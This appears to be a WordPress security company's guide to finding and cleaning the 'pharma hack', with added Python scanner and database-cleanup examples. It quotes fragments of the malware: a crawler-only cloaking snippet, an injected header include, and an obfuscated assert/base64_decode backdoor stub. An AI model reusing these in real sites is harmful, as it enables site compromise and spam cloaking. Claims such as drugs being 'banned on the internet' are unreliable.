WordPress Pharma Hack – How To Fix – 2024 GUIDE

Is your WordPress site littered with pharma links?

Are your index.php files infected with the pharma hack?


Key Takeaways

  • Understanding the Threat: The WordPress Pharma Hack is a deceptive infiltration that displays spam content to search engines, affecting your site’s SEO.
  • Common Symptoms: Unexpected advertisements for pharmaceutical products, especially when viewed via search engine results.
  • Detection: Regularly monitor your website for unexpected changes, especially in content and SEO rankings.
  • Prevention: Always keep your WordPress core, themes, and plugins updated. Use reliable security plugins and regularly scan for vulnerabilities.
  • Removal:
    • Database Cleanup: Search for suspicious content in the WordPress database, especially in posts and comments.
    • Files Inspection: Check the core files, themes, and plugins for any malicious injections or unfamiliar code.
    • User Roles: Ensure no unauthorized WordPress users or suspicious admin roles.
  • Post-Hack Actions: Change all passwords, ensure proper file permissions, and consider using a website firewall.
  • While exact numbers vary, many WordPress sites are vulnerable to such hacks due to outdated plugins or themes. Regular maintenance and monitoring can prevent a majority of these infiltrations.

WordPress has become one of the most popular Content Management Systems (CMS) in use in 2024. It is estimated that more than 17% of all websites on the internet that use WordPress are infected with some kind of malware. While security issues come with this type of application, many steps are taken to ensure that WordPress is as secure as possible. The pharma hack is a notorious, self-regenerating hack which can infect any WordPress site and may lead to serious consequences. Usually, in this kind of hack, users coming from search engines are sent to a pharma spam page (see example below).

The pharma hack has evolved a lot in 2024, and so have the steps to fix it.

A few weeks ago, we received a request to clean a pharma hack from the WordPress pages of one of our clients. While diagnosing their site, our WordPress experts found that the search results for the website looked more like a pharmacy business site than a helpful Web resource. This black hat SEO exploit was destroying their SEO rankings by targeting the Google SERPs, as a result of which their website was blacklisted by Google and started showing the “This Site May Be Hacked” message in Google.

In this article you will learn what the WordPress pharma hack is and how to find and remove the pharma hack from a WordPress site by cleaning up the database and the infected files.

What is A Pharma Hack – Meaning

The WordPress Pharma Hack, also known as the Google Viagra hack, is a kind of website spam hack that injects spam into WordPress pages and search engine results that is not visible to the normal user. The spam only shows up if the user agent is Google’s crawler (Googlebot). The infection is also tricky to remove and, if not done properly, will keep regenerating. Basically, the pharma hack is an exploit that takes advantage of vulnerabilities in WordPress. The attacker exploits vulnerable WP websites to distribute pharmaceutical content to search engines and website visitors. These attacks most often target search engines like Google or Bing in an attempt to increase traffic to illegal pharmaceutical businesses.

This hack quietly exploits your highest-ranking and most valuable pages by overriding the title tag and by inserting spam links into the page content. The modified title tag and spam links are only visible to search engines, which is usually achieved via cloaking. In 2018-19 we saw more instances of this kind of hack on WordPress sites than in 2017.

Let’s look at it another way. Several drugs like Viagra, Nexium and Cialis are banned on the internet, which means they are restricted from being promoted or sold over the web. Therefore some pharmaceutical companies try illegal methods of promoting their products. The pharma hack is one of them, and it has a devastating impact on the compromised website.

This web exploit is categorised as blackhat SEO spam and is mostly targeted at small business websites. Other hacks in the same category include: Gibberish Keywords Hack, Japanese Keywords Spam & WordPress malware redirect.

Below is a cached version of an infected page (screenshot: pharma hack spam on a WordPress website).

Google SERP results produced by a pharma hack (screenshot).


Regenerating Spam Doorway – Examples

Shockingly, on one of the WordPress sites a malicious wp-page.php was sighted which was creating auto-generated pharma spam doorways. On being discovered, this file was immediately located and deleted. When we opened that wp-page.php in a browser to verify that the problem was resolved, the malicious content was still present, even though the response headers showed it was not a cached page.

On thorough examination, wp-page.php was still present, with a current modification time. It was discovered that this file tended to recreate itself even after being deleted. Such behaviour resonates with malware using cron jobs to reinfect sites. Surprisingly, the user’s crontab did not show any signs of suspicious cron jobs.

A further scan of the server revealed a malicious nav.php file which was responsible for creating the wp-page.php file and also for injecting malicious wp-page.php links into clean site pages when they were fetched by Googlebot or Bingbot.

...
$movedb = user_min_browser($_SERVER['HTTP_USER_AGENT']); // attacker-defined helper; per the analysis above it yields 'moved' only for Googlebot/Bingbot requests
$movedb2 = 'moved';
if ($movedb == $movedb2) {
    // twenty doorway links to wp-page.php with random ids, served only to the crawler
    echo '<ul>';
    echo '<li><a href="http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_1.'">http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_1.'</a></li>';
    echo '<li><a href="http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_2.'">http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_2.'</a></li>';
    ...
    echo '<li><a href="http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_20.'">http://'.$mydomain.'/wp-page.php?t='.$myrandom_id_20.'</a></li>';
    echo '</ul>';
}


Now the moot question was to find out how the nav.php file got launched, since it was not part of the theme. The answer was an include added to the header.php of the same theme.

With this malicious code, the hacker referenced nav.php from header.php so that the malicious code executes as soon as a public site page is loaded.

A quick scan for nav.php revealed this code in the header.php of the theme:

<?php include 'nav.php'; ?>

The coding was done to facilitate the injection of spam to search engine crawlers and also to recreate the wp-page.php every time a public site page is loaded. This strategy was used as “delete protection” of the wp-page.php file.

The crux of the case is that a website is not secured just by casual scanning and removing malicious content; an in-depth scan has to be done to ensure that the site is clean. It also has to be ensured that the site is continuously monitored to fix any cron jobs, backdoors, security holes, etc., which will help the website owner keep present and future attackers and their harmful strategies at bay. The website owner needs to deploy a robust security monitoring system that ensures any malicious code executed on the server is addressed immediately.

⭐ Diagnosing SEO Pharma Hack


Purpose Of Google Pharma Hack

Many drugs like Viagra, Nexium and Cialis are banned, which means they are restricted from being promoted on websites. Therefore some pharmaceutical companies try illegal methods of promoting their products.

Pharma hack causes search engines to return ads for pharmaceutical products along with legitimate listings. The hack can be difficult to detect because it does not affect the displayed pages of the compromised Website or blog. The aim of this hack is to gain valuable links from high-ranking pages.

Because of this behaviour, many sites have been compromised for months with those spam keywords without anyone noticing.

Diagnosing and finding the pharma hack is another important task which needs to be done accurately and requires expertise. A quick way to check if your site is compromised is to search Google for “inurl:yoursite.com cheap viagra” or “inurl:yoursite.com cheap cialis”, or to use our free WordPress security scanner.

When we say that the spam links and content aren’t visible to users, we mean that a normal user will only see them in the Google search results. The description beneath the link to the website will show something related to the pharmaceutical products from the hacker’s site.

Even if you are the admin of the site and look through the HTML source code, you won’t find the spam links or content. This is because the malicious content is disguised and placed in your WordPress blog’s plugin folders, and in your database.

Since this exploit only targets the highest ranking pages and not all the pages on the site, it becomes more difficult to find.

How To Check If Your Site Is Hacked?

Wondering how to tell if your site is hacked with the pharma hack? This is one of the most important steps in removing pharma hack spam from your WordPress website. Go through the ways below in order to identify the infection.

1. Use a scanner

You can use free malware scanners for scanning your website. We have also developed our own tool specifically for this purpose.


2. See what Google sees

  • How Google identifies itself: when Google visits your website to retrieve your pages, it identifies itself using one of the following user-agent strings:
    Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
    Googlebot/2.1 (+http://www.googlebot.com/bot.html)
    Googlebot/2.1 (+http://www.google.com/bot.html)
    You need to use a tool that sets your browser’s user-agent string to look like Googlebot’s user-agent string.

We recommend the User-Agent Switcher tool.

For Chrome: https://chrome.google.com/webstore/detail/user-agent-switcher/dbclpoekepcmadpkeaelmhiheolhjflj?hl=en

For Firefox: https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/

Now retrieve one or more of the pages of your site and look for anything ‘different’ or out of place. If nothing is immediately apparent, view the source of your pages.


Usually this option is available by right clicking in the page and selecting ‘View source’ from the context sensitive popup menu. If the option isn’t there – try right clicking on a different (empty) part of the page.

In particular, check the following areas of the page’s source:
– the text between the two title tags: look for any words that don’t belong
– the text between the quotes following the content= part of the meta description tag
By now you have either found something or you haven’t.

One final check is to search this html source code for a select few words that should not ordinarily be found within the page.

  • For pharma hack, search for words such as: Viagra, Cialis or Regalis
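To automate the comparison above, here is an added example (not from the original article) that takes the HTML returned to a normal browser and the HTML returned when the request carried a Googlebot user-agent string, and reports the title, meta description and links that appear only in the Googlebot view and contain the pharma terms listed. The two sample pages are constructed and example.invalid is a placeholder domain.

```python
import re
from html.parser import HTMLParser

# Pharma terms the article tells you to search for in the fetched source.
PHARMA_TERMS = ("viagra", "cialis", "regalis")
TERM_RE = re.compile("|".join(PHARMA_TERMS), re.IGNORECASE)


class _PageFields(HTMLParser):
    """Collect the <title> text, the meta description and every link (href, text)."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.description = ""
        self.links = []
        self._in_title = False
        self._in_link = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "meta" and (attrs.get("name") or "").lower() == "description":
            self.description = attrs.get("content") or ""
        elif tag == "a":
            self._in_link = True
            self.links.append([attrs.get("href") or "", ""])

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "a":
            self._in_link = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        if self._in_link and self.links:
            self.links[-1][1] += data


def extract_fields(html):
    parser = _PageFields()
    parser.feed(html)
    parser.close()
    return {
        "title": parser.title.strip(),
        "description": parser.description.strip(),
        "links": {(href, text.strip()) for href, text in parser.links},
    }


def cloaking_findings(normal_html, googlebot_html):
    """Return (field, value) pairs present only in the Googlebot view that carry a pharma term."""
    normal, bot = extract_fields(normal_html), extract_fields(googlebot_html)
    findings = []
    for field in ("title", "description"):
        if bot[field] != normal[field] and TERM_RE.search(bot[field]):
            findings.append((field, bot[field]))
    for href, text in sorted(bot["links"] - normal["links"]):
        if TERM_RE.search(text) or TERM_RE.search(href):
            findings.append(("link", href))
    return findings


# Constructed sample pages: what a browser sees vs. what a Googlebot user-agent is served.
NORMAL_HTML = """<html><head><title>Example Blog - Home</title>
<meta name="description" content="Notes on gardening and home repair."></head>
<body><h1>Welcome</h1><a href="/about">About us</a></body></html>"""

GOOGLEBOT_HTML = """<html><head><title>Buy Cheap Viagra Online - Example Blog</title>
<meta name="description" content="Cheap cialis, no prescription needed."></head>
<body><h1>Welcome</h1><a href="/about">About us</a>
<ul><li><a href="http://example.invalid/wp-page.php?t=4821">cheap cialis</a></li></ul>
</body></html>"""

if __name__ == "__main__":
    for field, value in cloaking_findings(NORMAL_HTML, GOOGLEBOT_HTML):
        print(f"cloaked {field}: {value}")
```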

3. Use Webmaster Tools

You can use the ‘Fetch as Googlebot’ option within Google Webmaster Tools. Check the output code after the page is fetched and rendered.


4. Search in Google

The ‘site:’ operator is a handy way of telling Google to only show results from specific sites. For best results use:

  • site:yourdomain.com
  • or, site:yourdomain.com viagra
  • For advanced use you can group several words within parentheses:
    site:yourdomain.com (viagra|cialis|regalis|payday|blackjack|holdem|porn)


Why Is It Hard To Remove Pharma Hack?

In a pharma hack, the backdoors keep regenerating every time we remove them. Therefore, If the backdoors are regenerating, this might be due to malware that uses cron jobs to reinfect sites, so check the user’s crontab.

If you don’t find any cron job there, the hacker must have injected a backdoor which is leading to the recreation of the infection on the website. To identify the regenerating script, check whether any file’s content was adding wp-page.php to legitimate site pages whenever a request was made by Googlebot or Bingbot.

Adding wp-page.php based on Googlebot and Bingbot user-agents

Appending wp-page.php to legitimate requests isn’t the real problem; the actual problem is the regeneration of the file. For those unfamiliar with how themes work: if an include is added to the header file, it keeps loading the wp-page.php file every time the theme is loaded by a visitor.

The hacker injected this line into header.php to make the malicious code execute every time a public website page was requested. This is mainly done to send the spam to search engine crawlers, but it also recreates wp-page.php as a “delete protection” feature.

⭐ How does the Pharma hack work?

Basically, the hack consists of two parts—malicious files in the WordPress plugins folder coupled with encrypted code in the WordPress database. The files in the plugins folder contain code that runs the encrypted code stored in the database. Because of this, the pharma hack is dependent upon these rogue files in the plugins folder.

Typically, hack files contain easily-identifiable PHP functions like eval() and base64_decode(), and although the pharma hack is no exception, there’s one major difference. With the pharma hack, these functions are stored in the WordPress database as strings, and they’re encoded backwards! At runtime, a hack file in the plugins folder pulls these strings from the database, flips ’em, and then runs ’em as functions, and that’s how the deed gets done.


Most of the time, malicious content (in the form of code) is encoded to look like legitimate WordPress files and injected into the plugin folder. Any files other than the default files that ship with your original WordPress plugin install should be looked at closely, since they could be hack files.

The malicious code sends requests to Google for the list of the highest ranking pages on your website. It then stores this information in its database and targets those pages when it runs.

The pharma hack has various undetectable WordPress backdoors that let the hacker regain the access to your website:

  • Backdoor that allows the attackers to insert files.
  • Backdoor inside one (or more) plugins to insert the spam.
  • Backdoor inside the database used by the plugins.

If you fix one of the three, but forget about the rest, you’ll most likely be reinfected and the spam will continue to be indexed.


  • Backdoor Inserted into Files

Generally, attackers hunt for vulnerable WordPress installations, i.e. sites using an old version of WordPress, vulnerable plugins and themes, security loopholes, or accounts hosting multiple websites, often using free WordPress scanners. This is the very first step towards injecting backdoors into a compromised site.

When the backdoor is added, it is not immediately executed. Sometimes it stays for months without even getting called. The common places for these backdoors are:

wp-content/uploads/.*php (random PHP file name)
wp-includes/images/smilies/icon_smile_old.php.xl
wp-includes/wp-db-class.php
wp-includes/images/wp-img.php


In the pharma attack, these files carry a backdoor in the form of the following piece of code:

<?php
$XZKsyG='as';
$RqoaUO='e';
$ygDOEJ=$XZKsyG.'s'.$RqoaUO.'r'.'t';                                  // assembles the string 'assert'
$joEDdb='b'.$XZKsyG.$RqoaUO.(64).'_'.'d'.$RqoaUO.'c'.'o'.'d'.$RqoaUO;  // assembles the string 'base64_decode'
@$ygDOEJ(@$joEDdb('ZXZhbChiYXNlNjRfZGVjb2RlKCJhV1lvYVhOelpY... (long string)..   // assert(base64_decode(...)); the decoded text is itself another eval(base64_decode( layer

However, it is still calling eval(base64_decode, but using variables that make it hard to detect. In fact, none of the WordPress security plugins are able to find it. Therefore, look for a string like this in your WordPress folders:

php $[a-zA-Z]*='as';

If you inspect the code, you will see that it scans for the wp-config.php file and reads the database information. It then acts as a remote shell and retrieves a lot of information about the system. That’s the first thing you have to remove before you do anything else.

If you don’t, you may allow hackers to reinfect your site via a backdoor or unpatched security hole. Reinfection may happen within seconds or it may take days before the malware returns, causing another stressful situation.

As always, we recommend that you update your WordPress instance to the latest version. This goes for all of your plugins, themes, etc. WordPress is typically very secure; it’s when you’re running old versions and out-of-date plugins/themes that you run into trouble.


For WordPress site owners, there are several reliable free WordPress security plugins that monitor the integrity of core files and theme files. But if you find yourself in a position where you feel attackers are injecting spam in your web pages or SERPs, know that we’re here to help.☎️

  • Backdoor Inside Plugins or themes

The next step of the attack targets compromised plugins and themes, which is why WordPress theme security is very important. After successfully creating a backdoor into the system, a file will be created inside one of the existing plugins. Example:

akismet/wp-akismet.php
akismet/db-akismet.php
wp-pagenavi/db-pagenavi.php
wp-pagenavi/class-pagenavi.php
podpress/ext-podpess.php
tweetmeme/ext-tweetmeme.php
excerpt-editor/db-editor.php
akismet/.akismet.cache.php
akismet/.akismet.bak.php
tweetmeme/.tweetmem.old.php

They will target one or more old plugins using names like wp-[plugin].php, db-[plugin].php, ext-[plugin].php, etc.

Look for any plugin file with the wp_class_support string in it:

$ grep -r "wp_class_support" ./wp-content/plugins

Make sure you remove all those files and, if required, remove all such plugins. To be 100% sure your plugins are clean, I would recommend removing all of them and reinstalling them again (not possible for all sites, but this is probably the most secure way of doing it). Always keep them updated.
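The ’as’ pattern above and the wp_class_support grep can be combined into one sweep of the plugins folder. This is an added example, not the article’s own tool: it walks a plugins directory, flags the wp-/db-/ext-[plugin].php and dot-prefixed file names from the list above, and reports files whose contents match the indicators described in this article. The sample tree it builds in a temporary directory is constructed.

```python
import os
import re
import tempfile

# Content indicators from the article: the variable-assembled assert()/base64_decode()
# backdoor, the wp_class_support marker, and a plain eval(base64_decode( call.
CONTENT_SIGNATURES = {
    "obfuscated-assert": re.compile(r"\$[a-zA-Z]+\s*=\s*['\u2019]as['\u2019]\s*;"),
    "wp_class_support": re.compile(r"wp_class_support"),
    "eval-base64": re.compile(r"eval\s*\(\s*base64_decode", re.IGNORECASE),
}
# File-name pattern the attackers used inside existing plugin folders:
# wp-[plugin].php, db-[plugin].php, ext-[plugin].php and dot-prefixed .php files.
NAME_SIGNATURE = re.compile(r"^(?:wp|db|ext)-[\w.-]+\.php$|^\.[\w.-]+\.php$")


def scan_plugins(plugins_dir):
    """Walk a wp-content/plugins tree; return sorted (relative path, reason) hits."""
    hits = []
    for root, _dirs, files in os.walk(plugins_dir):
        for name in files:
            path = os.path.join(root, name)
            rel = os.path.relpath(path, plugins_dir).replace(os.sep, "/")
            if NAME_SIGNATURE.match(name):
                hits.append((rel, "suspicious-filename"))
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    head = fh.read(65536)  # the loader stub is small; the blob follows it
            except OSError:
                continue
            for label, pattern in CONTENT_SIGNATURES.items():
                if pattern.search(head):
                    hits.append((rel, label))
    return sorted(hits)


def build_sample_plugins():
    """Constructed sample tree: one clean plugin file plus two planted indicator files."""
    base = tempfile.mkdtemp(prefix="wp-plugins-")
    os.makedirs(os.path.join(base, "akismet"))
    os.makedirs(os.path.join(base, "wp-pagenavi"))
    samples = {
        "akismet/akismet.php": "<?php\n// constructed clean plugin file\nfunction akismet_init() {}\n",
        # only the first statements of the article's snippet, enough to trip the signature
        "akismet/wp-akismet.php": "<?php $XZKsyG='as';$RqoaUO='e';$ygDOEJ=$XZKsyG.'s'.$RqoaUO.'r'.'t';\n",
        "wp-pagenavi/db-pagenavi.php": "<?php\nfunction wp_class_support() { /* constructed stub */ }\n",
    }
    for rel, content in samples.items():
        with open(os.path.join(base, rel), "w", encoding="utf-8") as fh:
            fh.write(content)
    return base


if __name__ == "__main__":
    for rel, reason in scan_plugins(build_sample_plugins()):
        print(f"{reason:20} {rel}")
```

Run it against a real install with scan_plugins("/path/to/wp-content/plugins"); file-name hits are a heuristic and need a look at the file, while content hits should be treated as confirmed.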

  • Backdoor Inside the Database

This is the last step, and equally important. This is where the spam itself is hidden. They have been using the wp_options table with these names in the option_name:

wp_options -> class_generic_support
wp_options -> widget_generic_support
wp_options -> wp_check_hash
wp_options -> rss_7988287cd8f4f531c6b94fbdbc4e1caf
wp_options -> rss_d77ee8bfba87fa91cd91469a5ba5abea
wp_options -> rss_552afe0001e673901a9f2caebdd3141d

So, you need to run these SQL queries to clean your database:

delete from wp_options where option_name = 'class_generic_support';
delete from wp_options where option_name = 'widget_generic_support';
delete from wp_options where option_name = 'fwp';
delete from wp_options where option_name = 'wp_check_hash';
delete from wp_options where option_name = 'ftp_credentials';
delete from wp_options where option_name = 'rss_7988287cd8f4f531c6b94fbdbc4e1caf';
delete from wp_options where option_name = 'rss_d77ee8bfba87fa91cd91469a5ba5abea';
delete from wp_options where option_name = 'rss_552afe0001e673901a9f2caebdd3141d';

⭐ How To Remove the Pharma Hack From a WordPress site?

Go through the steps given below in order to cleanse your site and remove pharma hack spam from your WordPress website.

There are two ways to clean pharma hack files from your WordPress website:

  1. Manual Clean Up
    • Removing File from the Plugin Directory
    • Removing Database Entries.
  2. Security Service

Manual Cleanup:

While manually cleaning files, you are making changes to your WordPress files. Unless you are a skilled developer, we’d urge you not to choose manual removal of this hack. But if you have experience handling WordPress files and the database, follow this procedure:

The manual WordPress pharma hack cleanup includes two basic steps:

  1. Removing File from the Plugin Directory
  2. Removing Database Entries.

Removing File from the Plugin Directory:

Firstly login to your web host and go to a page called cPanel. There you should find an option for File Manager. Select the File Manager.


  1. You should find a folder called public_html on the left side of the File Manager. When you select this folder, a dropdown opens with the three main folders of your WordPress install:
  • wp-admin
  • wp-content
  • wp-includes


  2. Among these three folders, choose wp-content. Selecting it displays a dropdown list of its contents, where you will find the plugins folder.


This folder contains the files of every plugin installed on your WordPress site. We recommend starting with this folder because outdated plugins are the easiest targets for injecting compromised files and thus hacking a website.

  3. To identify malicious files, compare against the default files shipped with each plugin so that the suspicious ones stand out. To see every file, including hidden ones, go to cPanel, click File Manager, and in the popup that appears select ‘Show Hidden Files’.
  4. If you find any file that is not a default file, delete it. With this we complete the first step. Now, let’s move to the second step.

Removing The Entries From Database:

Now go back to cPanel. There you should find an option for phpMyAdmin. Open it.


In the database, select the wp_options table. It will allow you to browse through the table content. In the wp_options table, you’ll need to search for the following database entries:

class_generic_support
wp_check_hash
ftp_credentials
widget_generic_support
fwp
rss_% (delete all matches for rss_ except rss_excerpt_length and rss_language)

Delete all those entries using the SQL queries given earlier. And that’s it: your site is now hack free. Before deleting anything, make sure you have taken a full WordPress database backup and know how to export the WordPress database.
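As an added example (not the article’s own queries), the deletion rules above, together with the reversed-string trick described earlier (eval and base64_decode stored backwards), can be rehearsed against an in-memory SQLite copy of wp_options before the deletes are run on the live MySQL database. The sample rows are constructed.

```python
import sqlite3

# Option names the article lists as used by the pharma hack.
KNOWN_BAD_OPTIONS = ("class_generic_support", "widget_generic_support", "fwp",
                     "wp_check_hash", "ftp_credentials")
# Every rss_* option goes except these two legitimate WordPress settings.
RSS_KEEP = ("rss_excerpt_length", "rss_language")
# The hack stores its PHP backwards, so search for the reversed function names.
REVERSED_MARKERS = tuple(name[::-1] for name in ("eval", "base64_decode", "assert"))


def suspicious_options(conn):
    """Names of options whose value contains a reversed eval/base64_decode/assert."""
    rows = conn.execute("SELECT option_name, option_value FROM wp_options").fetchall()
    return sorted(name for name, value in rows
                  if any(marker in value for marker in REVERSED_MARKERS))


def cleanup_options(conn):
    """Apply the article's deletion rules; return how many rows were removed."""
    cur = conn.cursor()
    marks = ",".join("?" * len(KNOWN_BAD_OPTIONS))
    cur.execute(f"DELETE FROM wp_options WHERE option_name IN ({marks})", KNOWN_BAD_OPTIONS)
    removed = cur.rowcount
    # substr() rather than LIKE 'rss_%': '_' is a LIKE wildcard, so 'rssXfoo' would match too
    cur.execute("DELETE FROM wp_options WHERE substr(option_name, 1, 4) = 'rss_' "
                "AND option_name NOT IN (?, ?)", RSS_KEEP)
    removed += cur.rowcount
    conn.commit()
    return removed


def build_sample_db():
    """Constructed in-memory wp_options table mixing legitimate rows with hack rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, "
                 "option_name TEXT UNIQUE, option_value TEXT)")
    rows = [
        ("siteurl", "http://example.invalid"),
        ("active_plugins", 'a:1:{i:0;s:19:"akismet/akismet.php";}'),
        ("rss_excerpt_length", "50"),
        ("rss_language", "en"),
        ("class_generic_support", "a:0:{}"),
        ("widget_generic_support", "a:0:{}"),
        # constructed value: 'eval(base64_decode(' written backwards, as the hack does
        ("rss_7988287cd8f4f531c6b94fbdbc4e1caf", "(edoced_46esab(lave"),
    ]
    conn.executemany("INSERT INTO wp_options (option_name, option_value) VALUES (?, ?)", rows)
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    print("reversed-code options:", suspicious_options(db))
    print("rows removed:", cleanup_options(db))
```

The two DELETE statements use only substr() and IN, so the same WHERE clauses can be pasted into phpMyAdmin unchanged; run suspicious_options against an export first, because the article's list of option names is not exhaustive.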

Take Expert Help

If you are unsure how to handle WordPress files, using a security service is ideal. At WP Hacked Help you would raise a ticket to clean your hacked site. WP Hacked Help is one of the best WordPress security services in the market and lets you clean your site at the click of a button. Therefore, if you find yourself in a position where you feel attackers are injecting spam in your web pages or SERPs, just write to us.

⭐ Post Clean Up Steps:

Never skip these post pharma hack cleanup steps in order to  reduce the risk of a reinfection and ensure that your website remains clean:

  • Enable the website Firewall – WAF:

Enabling this valuable network security measure places a set of rules on incoming and outgoing traffic in order to protect networks, servers, websites and individual computers. The website firewall acts as a wall between a trusted source (say, the server your WordPress website is hosted on) and an untrusted source (the internet), through which only trusted data is allowed.


  • Keep Updating Your Website:

If you are using WordPress, keep updating it to the latest version. Why? Because out-of-date software is the leading cause of infections. This also includes your plugins, themes, and any other extension type.

  • Change your passwords:

It is prudent to change the passwords related to your website: FTP, SFTP, cPanel, Plesk, WP-admin, etc. They could have been compromised, and we do not want you to be reinfected because the attackers can still come back in through them. We recommend that you use a password manager, so you do not have to remember them all in your head.


  • Update your database password:

Also, update the password of your database. Keep a strong, unique and hard-to-guess password. Make sure you don’t use your name, spouse name or date of birth as the password for an integral part of your website. If you’re not familiar with handling changes in your database and configuration files, read our article.

  • Run an antivirus on your system:

In a lot of cases, we see that websites are compromised due to desktop malware that steals credentials. That’s why we always ask you to take a minute to run an antivirus product.


  • Backup Your Site:

After the site is clean and secure, a very good practice is to do regular backups. It reduces the chances of damage or risk of data loss to your website. Make sure to go through this WordPress site maintenance checklist to ensure smooth sailing.

For the most part, WordPress has been pretty solid in the security department. Security flaws are almost inevitable, but they’re usually caught early in the development stage. The fact is that when a malicious actor wants to infiltrate your website and he’s good enough at his craft, he’s probably going to succeed.
